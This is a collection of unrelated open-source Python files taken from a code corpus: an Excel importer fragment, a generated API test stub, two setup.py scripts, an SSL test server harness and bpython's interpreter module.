DownloadBase.set_progress(self.task, 0, 100)
download_ref = DownloadBase.get(file_ref_id)
if download_ref is None:
raise UnknownFileRefException("Could not find file wih ref %s. It may have expired" % file_ref_id)
self.workbook = WorkbookJSONReader(download_ref.get_filename())
def mark_complete(self):
if self.task:
DownloadBase.set_progress(self.task, 100, 100)
def add_progress(self, count=1):
self.progress += count
if self.task:
DownloadBase.set_progress(self.task, self.progress, self.total_rows)
class SingleExcelImporter(ExcelImporter):
"""
Manage importing from an excel file with only one
worksheet.
"""
def __init__(self, | task, file_ref_id):
super(SingleExcelImporter, self).__init__(task, file_ref_id)
self.worksheet = self.workbook.worksheets[0]
self.total_rows = self.worksheet.worksheet.get_highest_row()
class MultiExcelImporter(ExcelImporter):
"""
Manage importing from an excel file with multiple
relevant worksheets.
"""
def __init__(self, task, file_ | ref_id):
super(MultiExcelImporter, self).__init__(task, file_ref_id)
self.worksheets = self.workbook.worksheets
self.total_rows = sum(ws.worksheet.get_highest_row() for ws in self.worksheets)
|
ltowarek/budget-supervisor | third_party/saltedge/test/test_income_report_streams_regular.py | Python | mit | 1,008 | 0 | # coding: utf-8
"""
Salt Edge Account Information API
API Reference for | services # noqa: E501
OpenAPI spec version: 5.0.0
Contact: support@saltedge.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_clien | t
from swagger_client.models.income_report_streams_regular import IncomeReportStreamsRegular # noqa: E501
from swagger_client.rest import ApiException
class TestIncomeReportStreamsRegular(unittest.TestCase):
"""IncomeReportStreamsRegular unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testIncomeReportStreamsRegular(self):
"""Test IncomeReportStreamsRegular"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.income_report_streams_regular.IncomeReportStreamsRegular() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
nkgeorgiev/psilyp | setup.py | Python | gpl-2.0 | 286 | 0.003497 | from distutils.core import setup
setup(name | ='psilyp',
version='1.0',
description='A Basic lisp interpreter',
author='Nikolay Georgiev',
author_email='nikolaykgeorgiev@gmail.com',
| url='https://github.com/HuKCaHa/psilyp',
packages=['psilyp'],
)
|
philipkershaw/ndg_security_server | ndg/security/server/test/integration/openidrelyingparty/authenticationservicesapp.py | Python | bsd-3-clause | 2,769 | 0.006862 | #!/usr/bin/env python
"""NDG Security test harness for authorisation middleware
NERC DataGrid Project
"""
__author__ = "P J Kershaw"
__date__ = "20/11/08"
__copyright__ = "(C) 2009 Science a | nd Technology Facilities Council"
__contact__ = "Philip.Kershaw@stfc.ac.uk"
_ | _revision__ = "$Id$"
from os import path
import optparse
from OpenSSL import SSL
from ndg.security.server.utils.paste_utils import PasteDeployAppServer
from ndg.security.test.unit.base import BaseTestCase
INI_FILEPATH = path.join(path.dirname(path.abspath(__file__)),
'authenticationservices.ini')
DEFAULT_PORT = 6443
# To start run
# $ paster serve authenticationservices.ini or run this file as a script
# $ ./authenticationservicesapp.py [port #]
if __name__ == '__main__':
defCertFilePath = path.join(BaseTestCase.NDGSEC_TEST_CONFIG_DIR,
'pki',
'localhost.crt')
defPriKeyFilePath = path.join(BaseTestCase.NDGSEC_TEST_CONFIG_DIR,
'pki',
'localhost.key')
parser = optparse.OptionParser()
parser.add_option("-p",
"--port",
dest="port",
default=DEFAULT_PORT,
type='int',
help="port number to run under")
parser.add_option("-s",
"--with-ssl",
dest="withSSL",
default='True',
help="Run with SSL")
parser.add_option("-c",
"--cert-file",
dest='certFilePath',
default=defCertFilePath,
help="SSL Certificate file")
parser.add_option("-k",
"--private-key-file",
default=defPriKeyFilePath,
dest='priKeyFilePath',
help="SSL private key file")
parser.add_option("-f",
"--conf",
dest="configFilePath",
default=INI_FILEPATH,
help="Configuration file path")
opt = parser.parse_args()[0]
if opt.withSSL.lower() == 'true':
ssl_context = SSL.Context(SSL.SSLv23_METHOD)
ssl_context.set_options(SSL.OP_NO_SSLv2)
ssl_context.use_privatekey_file(opt.priKeyFilePath)
ssl_context.use_certificate_file(opt.certFilePath)
else:
ssl_context = None
server = PasteDeployAppServer(cfgFilePath=path.abspath(opt.configFilePath),
port=opt.port,
ssl_context=ssl_context)
server.start() |
aktorion/bpython | bpython/curtsiesfrontend/interpreter.py | Python | mit | 4,702 | 0 | import code
import traceback
import sys
from codeop import CommandCompiler
from six import iteritems
from pygments.token import Generic, Token, Keyword, Name, Comment, String
from pygments.token import Error, Literal, Number, Operator, Punctuation
from pygments.token import Whitespace
from pygments.formatter import Formatter
from pygments.lexers import get_lexer_by_name
from bpython.curtsiesfrontend.parse import parse
from bpython.repl import Interpreter as ReplInterpreter
from bpython.config import getpreferredencoding
from bpython._py3compat import py3
default_colors = {
Generic.Error: 'R',
Keyword: 'd',
Name: 'c',
Name.Builtin: 'g',
Comment: 'b',
String: 'm',
Error: 'r',
Literal: 'd',
Number: 'M',
Number.Integer: 'd',
Operator: 'd',
Punctuation: 'd',
Token: 'd',
Whitespace: 'd',
Token.Punctuation.Parenthesis: 'R',
Name.Function: 'd',
Name.Class: 'd'
}
class BPythonFormatter(Formatter):
"""This is subclassed from the custom formatter for bpython. Its format()
method receives the | tokensource and outfile params passed to it from the
Pygments highlight() method a | nd slops them into the appropriate format
string as defined above, then writes to the outfile object the final
formatted string. This does not write real strings. It writes format string
(FmtStr) objects.
See the Pygments source for more info; it's pretty
straightforward."""
def __init__(self, color_scheme, **options):
self.f_strings = {}
for k, v in iteritems(color_scheme):
self.f_strings[k] = '\x01%s' % (v,)
Formatter.__init__(self, **options)
def format(self, tokensource, outfile):
o = ''
for token, text in tokensource:
while token not in self.f_strings:
token = token.parent
o += "%s\x03%s\x04" % (self.f_strings[token], text)
outfile.write(parse(o.rstrip()))
class Interp(ReplInterpreter):
def __init__(self, locals=None, encoding=None):
"""Constructor.
The optional 'locals' argument specifies the dictionary in
which code will be executed; it defaults to a newly created
dictionary with key "__name__" set to "__console__" and key
"__doc__" set to None.
We include an argument for the outfile to pass to the formatter for it
to write to.
"""
if locals is None:
locals = {"__name__": "__console__", "__doc__": None}
if encoding is None:
encoding = getpreferredencoding()
ReplInterpreter.__init__(self, locals, encoding)
self.locals = locals
self.compile = CommandCompiler()
# typically changed after being instantiated
self.write = lambda stuff: sys.stderr.write(stuff)
self.outfile = self
def writetb(self, lines):
tbtext = ''.join(lines)
lexer = get_lexer_by_name("pytb")
self.format(tbtext, lexer)
# TODO for tracebacks get_lexer_by_name("pytb", stripall=True)
def format(self, tbtext, lexer):
traceback_informative_formatter = BPythonFormatter(default_colors)
traceback_code_formatter = BPythonFormatter({Token: ('d')})
tokens = list(lexer.get_tokens(tbtext))
no_format_mode = False
cur_line = []
for token, text in tokens:
if text.endswith('\n'):
cur_line.append((token, text))
if no_format_mode:
traceback_code_formatter.format(cur_line, self.outfile)
no_format_mode = False
else:
traceback_informative_formatter.format(cur_line,
self.outfile)
cur_line = []
elif text == ' ' and cur_line == []:
no_format_mode = True
cur_line.append((token, text))
else:
cur_line.append((token, text))
assert cur_line == [], cur_line
def code_finished_will_parse(s, compiler):
"""Returns a tuple of whether the buffer could be complete and whether it
will parse
True, True means code block is finished and no predicted parse error
True, False means code block is finished because a parse error is predicted
False, True means code block is unfinished
False, False isn't possible - an predicted error makes code block done"""
try:
finished = bool(compiler(s))
code_will_parse = True
except (ValueError, SyntaxError, OverflowError):
finished = True
code_will_parse = False
return finished, code_will_parse
|
hickford/datrie | setup.py | Python | lgpl-2.1 | 2,391 | 0.000418 | #! /usr/bin/env python
"""Super-fast, efficiently stored Trie for Python."""
import os
import sys
from setuptools import setup, Extension
from setuptools.command.test import test as TestCommand
LIBDATRIE_DIR = 'libdatrie/datrie'
LIBDATRIE_FILE_NAMES = [
'alpha-map.c', 'darray.c', 'fileutils.c', 'tail.c', 'trie.c',
'dstring.c', 'trie-string.c',
]
LIBDATRIE_FILES = [os.path.join(LIBDATRIE_DIR, name)
for name in LIBDATRIE_FILE_NAMES]
DESCRIPTION = __doc__
LONG_DESCRIPTION = open('README.rst').read() + open('CHANGES.rst').read()
LICENSE = 'LGPLv2+'
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: GNU Lesser General Public License v2 or later (LGPLv2+)',
'Programming Language :: Cython',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Text Processing :: Linguistic'
]
class PyTest(TestCommand):
"""Unfortunately :mod:`setuptools` support only :mod:`unittest`
based tests, thus, we have to overider | build-in ``test`` command
to run :mod:`pytest`.
"""
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
s | ys.exit(pytest.main(self.test_args + ["./tests"]))
setup(
name="datrie",
version="0.7",
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
author='Mikhail Korobov',
author_email='kmike84@gmail.com',
license=LICENSE,
url='https://github.com/kmike/datrie',
classifiers=CLASSIFIERS,
ext_modules=[
Extension("datrie", [
'src/datrie.c',
'src/cdatrie.c',
'src/stdio_ext.c'
] + LIBDATRIE_FILES, include_dirs=['libdatrie'])
],
tests_require=["pytest", "hypothesis"],
cmdclass={"test": PyTest}
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.